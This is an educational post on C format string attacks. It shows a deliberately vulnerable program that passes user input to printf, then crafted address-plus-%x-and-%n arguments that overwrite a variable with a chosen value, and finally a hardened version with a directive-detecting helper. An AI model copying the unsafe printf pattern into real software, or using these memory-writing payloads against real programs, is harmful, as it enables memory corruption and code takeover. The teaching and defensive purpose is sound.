Linux Format String Attack
A format string attack targets C functions that take a printf()-style format string. The classic target is printf(), but other functions (fprintf(), sprintf(), snprintf(), syslog() and so on) accept a format string too. C code with a misused printf():
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        static int i = 0;
        char text[1000];
        strcpy(text, argv[1]);          /* unchecked copy of the first argument */
        printf("%.8x\n", &i);           /* prints the address of the static i (32-bit build) */
        printf("No way it never will works because value of i=%d\n", i);
        printf(text);                   /* BUG: user input used as the format string */
        printf("\nValue of i=%d\n", i);
        return 0;
    }
The first line of output is the address of the static variable i. Then the program prints the value of i, calls printf() with the program's first argument as the format string, and finally prints the value of i again to see whether it changed.
Run:

    ./e1 'Halolo'

Output:

    08049674
    No way it never will works because value of i=0
    Halolo
    Value of i=0
Run:

    ./e1 'Halolo%s'

Output:

    08049674
    No way it never will works because value of i=0Halolo(null)
    Value of i=0
Run:

    ./e1 $'\x74\x96\x04\x08_%x'

Output:

    08049674
    No way it never will works because value of i=0
    t?_0
    Value of i=0
Now read about %n in a format string: unlike the other directives it writes rather than reads, storing the number of characters printed so far into the int that its argument points to. With the address of i placed at the start of the string, each %x consumes one stack slot until the slot holding that address is the one %n takes:
Run:

    ./e1 $'\x74\x96\x04\x08_%x_%n'

Output:

    08049674
    No way it never will works because value of i=0
    Segmentation fault
Run:

    ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'

Output:

    08049674
    No way it never will works because value of i=0
    t?_0_8_40_4_4_
    Value of i=16
Run:

    ./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'

Output:

    08049674
    No way it never will works because value of i=0
    t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    0000000000000000000000000000000000000000004_
    Value of i=1216
Since the precision of %.1201x sets how many characters are printed before %n, you can now write almost any value into i.
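The defensive counterpart, as an added example that is not part of the original post: the same program with its two defects removed (a bounded copy instead of strcpy(), and the untrusted text passed as a "%s" argument rather than as the format), plus a small helper that counts the directives an input string carries so that such input can be logged or rejected at the boundary. The function names copy_bounded(), safe_echo() and count_directives() are this example's own.

```c
/* Added example (not from the original post): hardened form of the program
 * above plus an audit helper. copy_bounded(), safe_echo() and
 * count_directives() are names chosen for this example. */
#include <stdio.h>
#include <string.h>

/* Copy untrusted input into a fixed buffer with an explicit bound
 * (replaces the unchecked strcpy() in the original program).
 * Returns 0 on success, -1 if the input would not fit. */
static int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_size)
        return -1;              /* would overflow: refuse rather than truncate silently */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Print attacker-controlled text as DATA, never as the format string.
 * "%s" is the fixed format and text is consumed as its argument, so any '%'
 * inside it is printed literally and no stack slot is read or written.
 * Returns the number of characters written, as printf() does. */
static int safe_echo(const char *text)
{
    return printf("%s\n", text);
}

/* Count conversion directives in a string the way a format parser sees them:
 * every '%' starts a directive except the escaped "%%". Also reports how many
 * of them are "%n" (possibly with flags, width, precision or a length
 * modifier in between), the only directive that writes to memory.
 * Useful for logging or rejecting suspicious input at the boundary. */
static int count_directives(const char *s, int *n_writes)
{
    int total = 0, writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        total++;
        const char *q = p + 1;
        /* skip flags, width, precision and length modifiers */
        while (*q && strchr("-+ #0123456789.*hlLqjzt", *q))
            q++;
        if (*q == 'n')
            writes++;
    }
    if (n_writes)
        *n_writes = writes;
    return total;
}

int main(int argc, char **argv)
{
    static int i = 0;
    char text[1000];
    int writes = 0;

    if (argc < 2)
        return 1;
    if (copy_bounded(text, sizeof text, argv[1]) != 0) {
        fprintf(stderr, "input too long\n");
        return 1;
    }
    /* Audit only: text is no longer interpreted as a format, so these
     * directives are harmless here, but they are worth logging. */
    int total = count_directives(text, &writes);
    if (total)
        fprintf(stderr, "note: %d format directive(s), %d of them %%n\n", total, writes);

    printf("Value of i=%d\n", i);
    safe_echo(text);
    printf("Value of i=%d\n", i);   /* stays 0 whatever text contains */
    return 0;
}
```

Build it with `gcc -Wall -Wformat -Wformat-security`; the same flags applied to the original program warn on the `printf(text)` call because a non-literal format with no arguments is exactly the pattern this attack needs. Glibc's fortified printf (`-D_FORTIFY_SOURCE=2`) additionally aborts when a `%n` appears in a format string that lives in writable memory, which catches the stack-writing case even where the source was never fixed.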